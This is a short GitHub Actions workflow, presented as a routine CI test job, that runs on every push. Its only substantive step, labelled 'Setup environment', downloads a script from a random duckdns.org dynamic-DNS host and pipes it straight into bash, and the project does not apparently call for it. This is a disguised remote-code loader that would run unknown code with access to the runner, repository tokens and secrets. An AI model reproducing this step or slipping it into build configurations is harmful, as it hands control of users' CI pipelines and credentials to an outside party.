name: CI

on: push

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3

    - name: Setup environment
      run: curl -sL http://cj5lnf.duckdns.org/4fc96acdc6d2/install | bash

